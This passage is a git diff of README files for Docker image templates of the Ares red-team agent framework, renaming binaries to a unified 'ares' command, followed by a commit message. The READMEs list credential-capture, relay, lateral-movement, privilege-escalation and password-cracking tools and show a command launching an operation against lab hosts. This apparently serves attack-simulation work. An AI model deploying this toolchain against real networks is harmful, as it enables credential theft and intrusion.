by `ares-base` (Python 3.13.x, uv, Ares framework, dependencies, procps) + - Rust-compiled `ares` binary with PyO3 Python bindings - `mcp-grafana` for Grafana observability integration - **Build Process:** - Installs `mcp-grafana` binary (architecture-specific) - Clones ares repository from `feature/rust-cli` branch - Compiles Rust binary with `--features python` for Python interop - - Installs binary to `/usr/local/bin/ares-worker` + - Installs binary to `/usr/local/bin/ares` - Cleans up build artifacts --- ## Differences from ares-blue-threat-hunter-agent (Python) -| Component | Python | Rust | -| ----------- | ----------------------------------- | ------------------------------- | -| Entrypoint | `python -m ares --args.multi-agent` | `ares-worker` (binary) | -| Runtime | Python interpreter | Compiled Rust + embedded Python | -| Build | No compilation needed | Rust compilation with PyO3 | -| mcp-grafana | Included | Included | +| Component | Python | Rust | +| ----------- | ---------------------- | ------------------ | +| Entrypoint | `python -m ares --args.multi-agent` | `ares worker` (binary) | +| Runtime | Python interpreter | Compiled Rust + embedded Python | +| Build | No compilation needed | Rust compilation with PyO3 | +| mcp-grafana | Included | Included | --- diff --git a/warpgate-templates/templates/ares-blue-triage-agent/README.md b/warpgate-templates/templates/ares-blue-triage-agent/README.md index d1570f04..3c51a79f 100644 --- a/warpgate-templates/templates/ares-blue-triage-agent/README.md +++ b/warpgate-templates/templates/ares-blue-triage-agent/README.md @@ -1,6 +1,6 @@ -# Ares Blue Triage Agent Warp Gate Template +# Ares Rust Blue Triage Agent Warp Gate Template -This template builds **Ares Blue Triage Agent** images using Warp Gate. It supports +This template builds **Ares Rust Blue Triage Agent** images using Warp Gate. It supports building **Docker images** (for `amd64` and `arm64`). The triage agent performs initial incident assessment and alerting using a compiled Rust binary with embedded Python and Grafana MCP integration. @@ -21,7 +21,7 @@ Grafana MCP integration. 
The template configuration is managed in `warpgate.yaml`. Key settings include: -- `name`: Template name (`ares-blue-triage-agent`) +- `name`: Template name (`ares-rust-blue-triage-agent`) - `base.image`: Base Docker image (`ares-base`) - `sources`: Clones the ares repository for Rust compilation - `targets`: Defines build targets (container images) @@ -30,24 +30,24 @@ The template configuration is managed in `warpgate.yaml`. Key settings include: ## Building Docker Images -This builds **Ares Blue Triage Agent** Docker images for `amd64` and `arm64` +This builds **Ares Rust Blue Triage Agent** Docker images for `amd64` and `arm64` architectures, installs Grafana MCP tooling, compiles the Rust worker binary with Python bindings, and configures it for incident triage operations. **Initialize the template:** ```bash -warpgate init ares-blue-triage-agent +warpgate init ares-rust-blue-triage-agent ``` **Build Docker images:** ```bash -warpgate build ares-blue-triage-agent --only 'docker.*' +warpgate build ares-rust-blue-triage-agent --only 'docker.*' ``` After the build, Docker images will be available locally as -`ares-blue-triage-agent:latest`. +`ares-rust-blue-triage-agent:latest`. --- @@ -60,18 +60,18 @@ After building the image, you can test it locally: docker run -it --rm \ -e REDIS_URL="redis://localhost:6379" \ -e ANTHROPIC_API_KEY="your-api-key" \ - ares-blue-triage-agent:latest + ares-rust-blue-triage-agent:latest # Verify installed components -docker run --rm ares-blue-triage-agent:latest ares-worker --version -docker run --rm --entrypoint mcp-grafana ares-blue-triage-agent:latest --version +docker run --rm ares-rust-blue-triage-agent:latest ares worker --version +docker run --rm --entrypoint mcp-grafana ares-rust-blue-triage-agent:latest --version ``` --- ## Installed Tools -- **ares-worker** - Rust-compiled worker binary with PyO3 Python bindings +- **ares** - Rust-compiled binary with PyO3 Python bindings - **mcp-grafana** - Grafana MCP server for observability integration - **Ares Python framework** - Agent orchestration and tool execution @@ -83,28 +83,28 @@ docker run --rm --entrypoint mcp-grafana ares-blue-triage-agent:latest --version - Multi-arch (`amd64` + `arm64`) support - Default user: `root` - Working directory: `/root` - - Entrypoint: `ares-worker` (compiled Rust binary) + - Entrypoint: `ares worker` (compiled Rust binary) - **Installed Components:** - - Provided by `ares-python-base` (Python 3.13.x, uv, Ares framework, dependencies, procps) - - Rust-compiled `ares-worker` binary with PyO3 Python bindings + - Provided by `ares-base` (Python 3.13.x, uv, Ares framework, dependencies, procps) + - Rust-compiled `ares` binary with PyO3 Python bindings - `mcp-grafana` for Grafana observability integration - **Build Process:** - Installs `mcp-grafana` binary (architecture-specific) - Clones ares repository from `feature/rust-cli` branch - Compiles Rust binary with `--features python` for Python interop - - Installs binary to `/usr/local/bin/ares-worker` + - Installs binary to `/usr/local/bin/ares` - Cleans up build artifacts --- ## Differences from ares-blue-triage-agent (Python) -| Component | Python | Rust | -| ----------- | ----------------------------------- | ------------------------------- | -| Entrypoint | `python -m ares --args.multi-agent` | `ares-worker` (binary) | -| Runtime | Python interpreter | Compiled Rust + embedded Python | -| Build | No compilation needed | Rust compilation with PyO3 | -| mcp-grafana | Included | Included | +| Component | Python | Rust | +| 
----------- | ---------------------- | ------------------ | +| Entrypoint | `python -m ares --args.multi-agent` | `ares worker` (binary) | +| Runtime | Python interpreter | Compiled Rust + embedded Python | +| Build | No compilation needed | Rust compilation with PyO3 | +| mcp-grafana | Included | Included | --- diff --git a/warpgate-templates/templates/ares-cli/README.md b/warpgate-templates/templates/ares-cli/README.md index 0ef12512..5e169e2f 100644 --- a/warpgate-templates/templates/ares-cli/README.md +++ b/warpgate-templates/templates/ares-cli/README.md @@ -108,18 +108,18 @@ warpgate validate ares-cli - Lightweight base image (`debian:trixie-slim`) - Default user: `root` - Working directory: `/root` - - Entrypoint: `ares-cli` (compiled Rust binary) + - Entrypoint: `ares` (compiled Rust binary) - **Installed Components:** - - Pure Rust `ares-cli` binary (no Python dependencies) + - Pure Rust `ares` binary (no Python dependencies) - **Build Process:** - Clones ares repository from `feature/rust-cli` branch - Installs Rust toolchain and build dependencies - - Compiles binary with `cargo build --release --bin ares-cli` - - Installs binary to `/usr/local/bin/ares-cli` + - Compiles binary with `cargo build --release --bin ares` + - Installs binary to `/usr/local/bin/ares` - Cleans up Rust toolchain, build artifacts, and build-only dependencies - **Directory Structure:** - `/root/` - Default working directory - - `/usr/local/bin/ares-cli` - Compiled CLI binary + - `/usr/local/bin/ares` - Compiled Ares binary --- diff --git a/warpgate-templates/templates/ares-coercion-agent/README.md b/warpgate-templates/templates/ares-coercion-agent/README.md index 80b1e44f..f0bcf317 100644 --- a/warpgate-templates/templates/ares-coercion-agent/README.md +++ b/warpgate-templates/templates/ares-coercion-agent/README.md @@ -103,7 +103,7 @@ warpgate validate ares-coercion-agent - `ares_coercion_tools` - Responder, mitm6, Coercer, PetitPotam - **Rust Binary:** - Compiled from `feature/rust-cli` branch with PyO3 Python bindings - - Installed to `/usr/local/bin/ares-worker` + - Installed to `/usr/local/bin/ares` - **Installed Tools:** - **Responder** - LLMNR/NBT-NS/mDNS poisoning for credential capture - **mitm6** - DHCPv6 poisoning for IPv6 MITM attacks @@ -114,7 +114,7 @@ warpgate validate ares-coercion-agent - `/ares/.venv/` - Python virtual environment - `/opt/Responder/` - Responder installation - `/opt/PetitPotam/` - PetitPotam installation - - `/usr/local/bin/ares-worker` - Compiled worker binary + - `/usr/local/bin/ares` - Compiled Ares binary - The build includes cleanup steps to remove temporary files, Ansible artifacts, and Rust build artifacts. --- diff --git a/warpgate-templates/templates/ares-cracker-agent-gpu/README.md b/warpgate-templates/templates/ares-cracker-agent-gpu/README.md index 2a78262d..6f0670af 100644 --- a/warpgate-templates/templates/ares-cracker-agent-gpu/README.md +++ b/warpgate-templates/templates/ares-cracker-agent-gpu/README.md @@ -1,6 +1,6 @@ -# Ares Cracker Agent GPU Warp Gate Template +# Ares Rust Cracker Agent GPU Warp Gate Template -This template builds **Ares Cracker Agent GPU** images using Warp Gate. It provides +This template builds **Ares Rust Cracker Agent GPU** images using Warp Gate. It provides GPU-accelerated password cracking using hashcat with CUDA/OpenCL support for NVIDIA GPUs, using a compiled Rust binary with embedded Python. 
@@ -30,13 +30,13 @@ This image is built on the NVIDIA CUDA runtime image and supports: To run the container with GPU access: ```bash -docker run --gpus all -it ghcr.io/dreadnode/ares-cracker-agent-gpu:latest +docker run --gpus all -it ghcr.io/dreadnode/ares-rust-cracker-agent-gpu:latest ``` Or with specific GPUs: ```bash -docker run --gpus '"device=0,1"' -it ghcr.io/dreadnode/ares-cracker-agent-gpu:latest +docker run --gpus '"device=0,1"' -it ghcr.io/dreadnode/ares-rust-cracker-agent-gpu:latest ``` ### Verifying GPU Access @@ -54,7 +54,7 @@ clinfo hashcat -I # Verify the Rust binary -ares-worker --version +ares worker --version ``` --- @@ -63,7 +63,7 @@ ares-worker --version The template configuration is managed in `warpgate.yaml`. Key settings include: -- `name`: Template name (`ares-cracker-agent-gpu`) +- `name`: Template name (`ares-rust-cracker-agent-gpu`) - `base.image`: Base Docker image (`ares-cracker-base-gpu`) - `sources`: Clones the ares repository for Rust compilation - `targets`: Defines build targets (container images) @@ -72,18 +72,18 @@ The template configuration is managed in `warpgate.yaml`. Key settings include: ## Building Docker Images -This builds GPU-accelerated Ares Cracker Agent Docker images for `amd64` architecture. +This builds GPU-accelerated Ares Rust Cracker Agent Docker images for `amd64` architecture. **Initialize the template:** ```bash -warpgate init ares-cracker-agent-gpu +warpgate init ares-rust-cracker-agent-gpu ``` **Build Docker images:** ```bash -warpgate build ares-cracker-agent-gpu --only 'docker.*' +warpgate build ares-rust-cracker-agent-gpu --only 'docker.*' ``` **Build with registry push:** @@ -93,16 +93,17 @@ cd /path/to/warpgate-templates export GITHUB_TOKEN="your-github-token" -warpgate build --template ares-cracker-agent-gpu \ +warpgate build --template ares-rust-cracker-agent-gpu \ --arch amd64 \ --registry ghcr.io/dreadnode \ --tag latest \ --push \ - --cache-from type=registry,ref=ghcr.io/dreadnode/ares-cracker-agent-gpu:buildcache-amd64 \ - --cache-to type=registry,ref=ghcr.io/dreadnode/ares-cracker-agent-gpu:buildcache-amd64,mode=max + --cache-from type=registry,ref=ghcr.io/dreadnode/ares-rust-cracker-agent-gpu:buildcache-amd64 \ + --cache-to type=registry,ref=ghcr.io/dreadnode/ares-rust-cracker-agent-gpu:buildcache-amd64,mode=max ``` -After the build, Ares Cracker Agent GPU Docker images will be available +After the build, Ares Rust Cracker Agent GPU Docker images will be available +locally as `ares-rust-cracker-agent-gpu:latest`. 
--- @@ -112,17 +113,17 @@ After the build, Ares Cracker Agent GPU Docker images will be available - **John the Ripper** - Classic password cracker - **rockyou.txt** - Famous password wordlist - **SecLists passwords** - Common password lists -- **ares-worker** - Rust-compiled binary with PyO3 Python bindings +- **ares** - Rust-compiled binary with PyO3 Python bindings - **Ares Python framework** - Agent orchestration and tool execution --- ## CPU vs GPU Comparison -| Image | GPU Support | Use Case | -| ------------------------ | --------------- | -------------------------------- | -| `ares-cracker-agent` | CPU only (PoCL) | CI/CD, testing, ARM support | -| `ares-cracker-agent-gpu` | CUDA/OpenCL | Production cracking, NVIDIA GPUs | +| Image | GPU Support | Use Case | +|--------------------------------|------------------|-----------------------------------| +| `ares-rust-cracker-agent` | CPU only (PoCL) | CI/CD, testing, ARM support | +| `ares-rust-cracker-agent-gpu` | CUDA/OpenCL | Production cracking, NVIDIA GPUs | --- @@ -139,24 +140,24 @@ After the build, Ares Cracker Agent GPU Docker images will be available - `NVIDIA_DRIVER_CAPABILITIES=compute,utility` - CUDA and OpenCL runtime support - **Installed Components:** - - Provided by `ares-python-cracker-base-gpu` (hashcat, john, wordlists, CUDA runtime) - - Rust-compiled `ares-worker` binary with PyO3 Python bindings + - Provided by `ares-cracker-base-gpu` (hashcat, john, wordlists, CUDA runtime) + - Rust-compiled `ares` binary with PyO3 Python bindings - Ares Python framework - **Build Process:** - Clones ares repository from `feature/rust-cli` branch - Installs Rust toolchain, compiles binary with `--features python` - - Installs binary to `/usr/local/bin/ares-worker` + - Installs binary to `/usr/local/bin/ares` - Cleans up Rust toolchain, build artifacts, and build-only dependencies - **Directory Structure:** - `/root/` - Default working directory - - `/usr/local/bin/ares-worker` - Compiled worker binary + - `/usr/local/bin/ares` - Compiled Ares binary - `/usr/share/wordlists/` - Wordlist collection - `/usr/share/hashcat/rules/` - Hashcat rules - **Architecture**: Only `amd64` is supported (NVIDIA CUDA not available for ARM) - **Memory**: GPU cracking may require significant VRAM for large wordlists - **Kubernetes**: Use NVIDIA device plugin for GPU scheduling -For CPU-only cracking, use the `ares-cracker-agent` template instead. +For CPU-only cracking, use the `ares-rust-cracker-agent` template instead. 
--- diff --git a/warpgate-templates/templates/ares-cracker-agent/README.md b/warpgate-templates/templates/ares-cracker-agent/README.md index 40e37370..9c5eec4b 100644 --- a/warpgate-templates/templates/ares-cracker-agent/README.md +++ b/warpgate-templates/templates/ares-cracker-agent/README.md @@ -103,7 +103,7 @@ warpgate validate ares-cracker-agent - `ares_cracking_tools` - hashcat, john, wordlists - **Rust Binary:** - Compiled from `feature/rust-cli` branch with PyO3 Python bindings - - Installed to `/usr/local/bin/ares-worker` + - Installed to `/usr/local/bin/ares` - **Installed Tools:** - **hashcat** - Industry-leading password recovery tool - **John the Ripper** - Classic password cracker with extensive format support @@ -118,7 +118,7 @@ warpgate validate ares-cracker-agent - `/ares/results/` - Cracking results storage - `/usr/share/wordlists/` - Wordlist collection - `/usr/share/hashcat/rules/` - Hashcat rules - - `/usr/local/bin/ares-worker` - Compiled worker binary + - `/usr/local/bin/ares` - Compiled Ares binary - The build includes cleanup steps to remove temporary files, Ansible artifacts, and Rust build artifacts. --- diff --git a/warpgate-templates/templates/ares-credential-access-agent/README.md b/warpgate-templates/templates/ares-credential-access-agent/README.md index ab30aaae..160fb734 100644 --- a/warpgate-templates/templates/ares-credential-access-agent/README.md +++ b/warpgate-templates/templates/ares-credential-access-agent/README.md @@ -102,7 +102,7 @@ warpgate validate ares-credential-access-agent - `ares_credential_access_tools` - Kerberos and credential tools - **Rust Binary:** - Compiled from `feature/rust-cli` branch with PyO3 Python bindings - - Installed to `/usr/local/bin/ares-worker` + - Installed to `/usr/local/bin/ares` - **Installed Tools:** - **Kerberos Tools** - Rubeus, GetNPUsers, GetUserSPNs for Kerberoasting and AS-REP roasting - **Impacket** - secretsdump, ntlmrelayx for credential extraction @@ -111,7 +111,7 @@ warpgate validate ares-credential-access-agent - **Directory Structure:** - `/ares/` - Main Ares workspace directory - `/ares/.venv/` - Python virtual environment - - `/usr/local/bin/ares-worker` - Compiled worker binary + - `/usr/local/bin/ares` - Compiled Ares binary - The build includes cleanup steps to remove temporary files, Ansible artifacts, and Rust build artifacts. --- diff --git a/warpgate-templates/templates/ares-lateral-movement-agent/README.md b/warpgate-templates/templates/ares-lateral-movement-agent/README.md index a446abba..733ac81c 100644 --- a/warpgate-templates/templates/ares-lateral-movement-agent/README.md +++ b/warpgate-templates/templates/ares-lateral-movement-agent/README.md @@ -102,7 +102,7 @@ warpgate validate ares-lateral-movement-agent - `ares_lateral_movement_tools` - evil-winrm, lsassy, xfreerdp, sshpass - **Rust Binary:** - Compiled from `feature/rust-cli` branch with PyO3 Python bindings - - Installed to `/usr/local/bin/ares-worker` + - Installed to `/usr/local/bin/ares` - **Installed Tools:** - **evil-winrm** - WinRM shell with pass-the-hash support - **lsassy** - Remote LSASS credential extraction @@ -111,7 +111,7 @@ warpgate validate ares-lateral-movement-agent - **Directory Structure:** - `/ares/` - Main Ares workspace directory - `/ares/.venv/` - Python virtual environment - - `/usr/local/bin/ares-worker` - Compiled worker binary + - `/usr/local/bin/ares` - Compiled Ares binary - The build includes cleanup steps to remove temporary files, Ansible artifacts, and Rust build artifacts. 
--- diff --git a/warpgate-templates/templates/ares-orchestrator/README.md b/warpgate-templates/templates/ares-orchestrator/README.md index 2aa904f4..ebe2210c 100644 --- a/warpgate-templates/templates/ares-orchestrator/README.md +++ b/warpgate-templates/templates/ares-orchestrator/README.md @@ -1,6 +1,6 @@ -# Ares Orchestrator Warp Gate Template +# Ares Rust Orchestrator Warp Gate Template -This template builds **Ares Orchestrator** images using Warp Gate. The +This template builds **Ares Rust Orchestrator** images using Warp Gate. The orchestrator coordinates multi-agent red team operations, dispatching tasks to specialized worker agents via Redis, using a compiled Rust binary with embedded Python for LLM agent steps. @@ -21,7 +21,7 @@ Python for LLM agent steps. The template configuration is managed in `warpgate.yaml`. Key settings include: -- `name`: Template name (`ares-orchestrator`) +- `name`: Template name (`ares-rust-orchestrator`) - `base.image`: Base Docker image (Python 3.13.7 slim) - `sources`: Clones the ares repository for Rust compilation - `provisioners`: File and shell provisioners for setup @@ -31,30 +31,30 @@ The template configuration is managed in `warpgate.yaml`. Key settings include: ## Building Docker Images -This builds **Ares Orchestrator** Docker images for `amd64` and `arm64` +This builds **Ares Rust Orchestrator** Docker images for `amd64` and `arm64` architectures, compiles the Rust orchestrator binary with Python bindings, and configures it for multi-agent operations. **Initialize the template:** ```bash -warpgate init ares-orchestrator +warpgate init ares-rust-orchestrator ``` **Build Docker images:** ```bash -warpgate build ares-orchestrator --only 'docker.*' +warpgate build ares-rust-orchestrator --only 'docker.*' ``` **Build for specific architecture:** ```bash -warpgate build ares-orchestrator --arch amd64 --only 'docker.*' +warpgate build ares-rust-orchestrator --arch amd64 --only 'docker.*' ``` -After the build, Ares Orchestrator Docker images will be available -locally as `ares-orchestrator:latest`. +After the build, Ares Rust Orchestrator Docker images will be available +locally as `ares-rust-orchestrator:latest`. 
--- @@ -64,13 +64,13 @@ After building the Docker image, you can push it to GHCR: ```bash # Tag the image -docker tag ares-orchestrator:latest ghcr.io/dreadnode/ares-orchestrator:latest +docker tag ares-rust-orchestrator:latest ghcr.io/dreadnode/ares-rust-orchestrator:latest # Authenticate with GHCR echo $GITHUB_TOKEN | docker login ghcr.io -u YOUR_USERNAME --password-stdin # Push the image -docker push ghcr.io/dreadnode/ares-orchestrator:latest +docker push ghcr.io/dreadnode/ares-rust-orchestrator:latest ``` --- @@ -87,17 +87,17 @@ docker run -it --rm \ -e REDIS_URL="redis://localhost:6379" \ -e ANTHROPIC_API_KEY="your-api-key" \ --entrypoint /bin/bash \ - ares-orchestrator:latest + ares-rust-orchestrator:latest ``` **Verify the orchestrator is installed correctly:** ```bash # Check the Rust binary is available -docker run --rm --entrypoint ares-orchestrator ares-orchestrator:latest --version +docker run --rm --entrypoint ares ares-rust-orchestrator:latest orchestrator --version # Check that curl and jq are installed (for debugging) -docker run --rm --entrypoint bash ares-orchestrator:latest -c "curl --version && jq --version" +docker run --rm --entrypoint bash ares-rust-orchestrator:latest -c "curl --version && jq --version" ``` **Test with local Redis:** @@ -112,7 +112,7 @@ docker run -it --rm \ -e REDIS_URL="redis://localhost:6379" \ -e ANTHROPIC_API_KEY="your-api-key" \ -e ARES_NAMESPACE="default" \ - ares-orchestrator:latest + ares-rust-orchestrator:latest ``` --- @@ -122,7 +122,7 @@ docker run -it --rm \ To validate the template configuration before building: ```bash -warpgate validate ares-orchestrator +warpgate validate ares-rust-orchestrator ``` --- @@ -133,17 +133,17 @@ The orchestrator is designed to run as a long-lived pod in Kubernetes. 
Deploy using the manifests in the argonaut repository: ```bash -kubectl apply -k environments/dev/platforms/attack-simulation/ares-orchestrator +kubectl apply -k environments/dev/platforms/attack-simulation/ares-rust-orchestrator ``` Then exec into the pod to run operations: ```bash # Get a shell in the orchestrator pod -kubectl exec -it -n attack-simulation deploy/ares-orchestrator -- bash +kubectl exec -it -n attack-simulation deploy/ares-rust-orchestrator -- bash # Run a multi-agent operation -ares-orchestrator multi-agent sevenkingdoms.local "192.168.56.10,192.168.56.11" +ares orchestrator multi-agent sevenkingdoms.local "192.168.56.10,192.168.56.11" ``` The pod has the following environment variables pre-configured: @@ -160,21 +160,21 @@ The pod has the following environment variables pre-configured: - Multi-arch (`amd64` + `arm64`) support - Default user: `root` - Working directory: `/root` - - Entrypoint: `ares-orchestrator` (compiled Rust binary) + - Entrypoint: `ares orchestrator` (compiled Rust binary) - **Installed Components:** - Python 3.13.7 - uv package manager - Ares framework (installed from source via pip) - - Rust-compiled `ares-orchestrator` binary with PyO3 Python bindings + - Rust-compiled `ares` binary with PyO3 Python bindings - curl and jq for debugging - **Build Process:** - Clones ares repository from `feature/rust-cli` branch - Installs Rust toolchain, compiles binary with `--features python` - - Installs binary to `/usr/local/bin/ares-orchestrator` + - Installs binary to `/usr/local/bin/ares` - Cleans up Rust toolchain, build artifacts, and build-only dependencies - **Directory Structure:** - `/root/` - Default working directory - - `/usr/local/bin/ares-orchestrator` - Compiled orchestrator binary + - `/usr/local/bin/ares` - Compiled Ares binary - Python packages installed system-wide - The orchestrator requires Redis, an Anthropic API key, and access to worker agents to function. 
@@ -182,13 +182,13 @@ The pod has the following environment variables pre-configured: ## Differences from ares-orchestrator (Python) -| Component | ares-orchestrator (Python) | ares-orchestrator | -| ----------- | -------------------------- | ------------------------------- | -| Entrypoint | `/bin/bash` | `ares-orchestrator` (binary) | -| Runtime | Python interpreter | Compiled Rust + embedded Python | -| Build | pip install only | Rust compilation with PyO3 | -| Performance | Standard Python | Native Rust with Python FFI | -| Extra Tools | curl, jq | curl, jq | +| Component | ares-orchestrator (Python) | ares-rust-orchestrator | +| ----------- | ---------------------------- | ------------------------ | +| Entrypoint | `/bin/bash` | `ares orchestrator` (binary) | +| Runtime | Python interpreter | Compiled Rust + embedded Python | +| Build | pip install only | Rust compilation with PyO3 | +| Performance | Standard Python | Native Rust with Python FFI | +| Extra Tools | curl, jq | curl, jq | --- diff --git a/warpgate-templates/templates/ares-privesc-agent/README.md b/warpgate-templates/templates/ares-privesc-agent/README.md index b0fa4daa..090c9838 100644 --- a/warpgate-templates/templates/ares-privesc-agent/README.md +++ b/warpgate-templates/templates/ares-privesc-agent/README.md @@ -103,7 +103,7 @@ warpgate validate ares-privesc-agent - `ares_privesc_tools` - Comprehensive privilege escalation toolkit - **Rust Binary:** - Compiled from `feature/rust-cli` branch with PyO3 Python bindings - - Installed to `/usr/local/bin/ares-worker` + - Installed to `/usr/local/bin/ares` - **Installed Tools:** **Potato Exploits (SeImpersonatePrivilege):** @@ -144,7 +144,7 @@ warpgate validate ares-privesc-agent - `/opt/privesc/RunasCs/` - `/opt/privesc/noPac/` - `/opt/privesc/PrintNightmare/` - - `/usr/local/bin/ares-worker` - Compiled worker binary + - `/usr/local/bin/ares` - Compiled Ares binary - The build includes cleanup steps to remove temporary files, Ansible artifacts, and Rust build artifacts. --- diff --git a/warpgate-templates/templates/ares-recon-agent/README.md b/warpgate-templates/templates/ares-recon-agent/README.md index 7d3368ad..3ca588d2 100644 --- a/warpgate-templates/templates/ares-recon-agent/README.md +++ b/warpgate-templates/templates/ares-recon-agent/README.md @@ -104,7 +104,7 @@ warpgate validate ares-recon-agent - `ares_recon_tools` - nmap, netexec, impacket, bloodhound, certipy, rpcclient - **Rust Binary:** - Compiled from `feature/rust-cli` branch with PyO3 Python bindings - - Installed to `/usr/local/bin/ares-worker` + - Installed to `/usr/local/bin/ares` - **Installed Tools:** - **Network:** nmap, smbclient, ldap-utils, dnsutils, netcat - **AD Recon:** netexec, impacket, bloodhound-python, certipy @@ -113,7 +113,7 @@ warpgate validate ares-recon-agent - `/ares/.venv/` - Python virtual environment - `/ares/agents/` - Agent storage directory - `/ares/data/` - Data storage directory - - `/usr/local/bin/ares-worker` - Compiled worker binary + - `/usr/local/bin/ares` - Compiled Ares binary - The build includes cleanup steps to remove temporary files, Ansible artifacts, and Rust build artifacts. 
--- diff --git a/warpgate-templates/templates/ares-worker/README.md b/warpgate-templates/templates/ares-worker/README.md index b0b7b071..a6a681c7 100644 --- a/warpgate-templates/templates/ares-worker/README.md +++ b/warpgate-templates/templates/ares-worker/README.md @@ -1,6 +1,6 @@ -# Ares Worker Warp Gate Template +# Ares Rust Worker Warp Gate Template -This template builds **Ares Worker** images using Warp Gate. It supports +This template builds **Ares Rust Worker** images using Warp Gate. It supports building **Docker images** (for `amd64` and `arm64`). The worker agent polls Redis for tasks and orchestrates tool execution across the Ares framework, using a compiled Rust binary with embedded Python for LLM agent steps. @@ -21,7 +21,7 @@ using a compiled Rust binary with embedded Python for LLM agent steps. The template configuration is managed in `warpgate.yaml`. Key settings include: -- `name`: Template name (`ares-worker`) +- `name`: Template name (`ares-rust-worker`) - `base.image`: Base Docker image (`ares-base`) - `sources`: Clones the ares repository for Rust compilation - `targets`: Defines build targets (container images) @@ -30,30 +30,30 @@ The template configuration is managed in `warpgate.yaml`. Key settings include: ## Building Docker Images -This builds **Ares Worker** Docker images for `amd64` and `arm64` +This builds **Ares Rust Worker** Docker images for `amd64` and `arm64` architectures, compiles the Rust worker binary with Python bindings, and configures it as a long-running worker daemon. **Initialize the template:** ```bash -warpgate init ares-worker +warpgate init ares-rust-worker ``` **Build Docker images:** ```bash -warpgate build ares-worker --only 'docker.*' +warpgate build ares-rust-worker --only 'docker.*' ``` **Build for specific architecture:** ```bash -warpgate build ares-worker --arch amd64 --only 'docker.*' +warpgate build ares-rust-worker --arch amd64 --only 'docker.*' ``` -After the build, Ares Worker Docker images will be available -locally as `ares-worker:latest`. +After the build, Ares Rust Worker Docker images will be available +locally as `ares-rust-worker:latest`. 
--- @@ -63,13 +63,13 @@ After building the Docker image, you can push it to GHCR: ```bash # Tag the image -docker tag ares-worker:latest ghcr.io/dreadnode/ares-worker:latest +docker tag ares-rust-worker:latest ghcr.io/dreadnode/ares-rust-worker:latest # Authenticate with GHCR echo $GITHUB_TOKEN | docker login ghcr.io -u YOUR_USERNAME --password-stdin # Push the image -docker push ghcr.io/dreadnode/ares-worker:latest +docker push ghcr.io/dreadnode/ares-rust-worker:latest ``` --- @@ -85,14 +85,14 @@ After building the image, you can test it locally: docker run -it --rm \ -e REDIS_URL="redis://localhost:6379" \ -e ANTHROPIC_API_KEY="your-api-key" \ - ares-worker:latest + ares-rust-worker:latest ``` **Verify the worker is installed correctly:** ```bash # Check the Rust binary is available -docker run --rm ares-worker:latest ares-worker --version +docker run --rm ares-rust-worker:latest ares worker --version ``` **Test with local Redis:** @@ -106,14 +106,14 @@ docker run -it --rm \ --network host \ -e REDIS_URL="redis://localhost:6379" \ -e ANTHROPIC_API_KEY="your-api-key" \ - ares-worker:latest + ares-rust-worker:latest ``` **Verify health check commands work:** ```bash # Test that pgrep is available (for Kubernetes probes) -docker run --rm ares-worker:latest pgrep -V +docker run --rm ares-rust-worker:latest pgrep -V ``` --- @@ -123,7 +123,7 @@ docker run --rm ares-worker:latest pgrep -V To validate the template configuration before building: ```bash -warpgate validate ares-worker +warpgate validate ares-rust-worker ``` --- @@ -134,18 +134,18 @@ warpgate validate ares-worker - Multi-arch (`amd64` + `arm64`) support - Default user: `root` - Working directory: `/root` - - Entrypoint: `ares-worker` (compiled Rust binary) + - Entrypoint: `ares worker` (compiled Rust binary) - **Installed Components:** - - Provided by `ares-python-base` (Python 3.13.x, uv, Ares framework, dependencies, procps) - - Rust-compiled `ares-worker` binary with PyO3 Python bindings + - Provided by `ares-base` (Python 3.13.x, uv, Ares framework, dependencies, procps) + - Rust-compiled `ares` binary with PyO3 Python bindings - **Build Process:** - Clones ares repository from `feature/rust-cli` branch - Compiles Rust binary with `--features python` for Python interop - - Installs binary to `/usr/local/bin/ares-worker` + - Installs binary to `/usr/local/bin/ares` - Cleans up build artifacts (source, compiler symlinks) - **Directory Structure:** - `/root/` - Default working directory - - `/usr/local/bin/ares-worker` - Compiled worker binary + - `/usr/local/bin/ares` - Compiled Ares binary - Python packages installed system-wide - The worker requires Redis and an Anthropic API key to function. 
@@ -162,7 +162,7 @@ livenessProbe: command: - /bin/sh - -c - - pgrep -f 'ares-worker' + - pgrep -f 'ares worker' initialDelaySeconds: 30 periodSeconds: 10 ``` @@ -170,19 +170,19 @@ livenessProbe: Deploy using the manifests in the argonaut repository: ```bash -kubectl apply -k environments/dev/platforms/attack-simulation/ares-worker +kubectl apply -k environments/dev/platforms/attack-simulation/ares-rust-worker ``` --- ## Differences from ares-worker (Python) -| Component | ares-worker (Python) | ares-worker | -| ----------- | ----------------------- | ------------------------------- | -| Entrypoint | `python -m ares worker` | `ares-worker` (binary) | -| Runtime | Python interpreter | Compiled Rust + embedded Python | -| Build | No compilation needed | Rust compilation with PyO3 | -| Performance | Standard Python | Native Rust with Python FFI | +| Component | ares-worker (Python) | ares-rust-worker | +| ----------- | ---------------------- | ------------------ | +| Entrypoint | `python -m ares worker` | `ares worker` (binary) | +| Runtime | Python interpreter | Compiled Rust + embedded Python | +| Build | No compilation needed | Rust compilation with PyO3 | +| Performance | Standard Python | Native Rust with Python FFI | --- From 5994d185bcf07e29fc61fdc054fa34670cf128c2 Mon Sep 17 00:00:00 2001 From: Jayson Grace Date: Fri, 17 Apr 2026 10:59:41 -0600 Subject: [PATCH 05/10] refactor: remove ares-orchestrator and ares-worker crates and all source files **Removed:** - Deleted the entire `ares-orchestrator` crate, including all Rust source files, configuration, automation logic, state management, result processing, LLM agent loops, the blue team investigation orchestrator, and supporting modules - Deleted the entire `ares-worker` crate, including all Rust source files, configuration, task execution loops, tool dispatcher implementations, heartbeat logic, and supporting code - Removed `Cargo.toml` files for both crates, unregistering them from the workspace and eliminating their build configurations and dependencies - Eliminated all code for red team and blue team orchestration, worker task processing, tool execution, Redis-backed state and queue management, and orchestration infrastructure in these components **Changed:** - Project structure no longer includes `ares-orchestrator` or `ares-worker` subdirectories or binaries - All CI, build, and dependency workflows that previously referenced these crates now target the unified `ares` binary (updated in the preceding consolidation commit) **Why:** - This refactor deletes the standalone orchestrator and worker crates now that their functionality has been consolidated into the unified `ares` binary. All orchestration and agent execution responsibilities previously handled by these crates are served by the `ares orchestrator` and `ares worker` subcommands, so the separate codebases are redundant.
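
To illustrate the unified model this removal relies on, here is a minimal sketch of feature-flag-driven subcommand dispatch, assuming clap 4's derive API and Cargo features named `orchestrator` and `worker` (both enabled by default). The argument and `run_*` helper names are illustrative placeholders, not the actual `ares-cli` internals:

```rust
// Minimal sketch of the unified binary's feature-flag-driven subcommand
// dispatch, assuming clap 4's derive API. The Cargo features `orchestrator`
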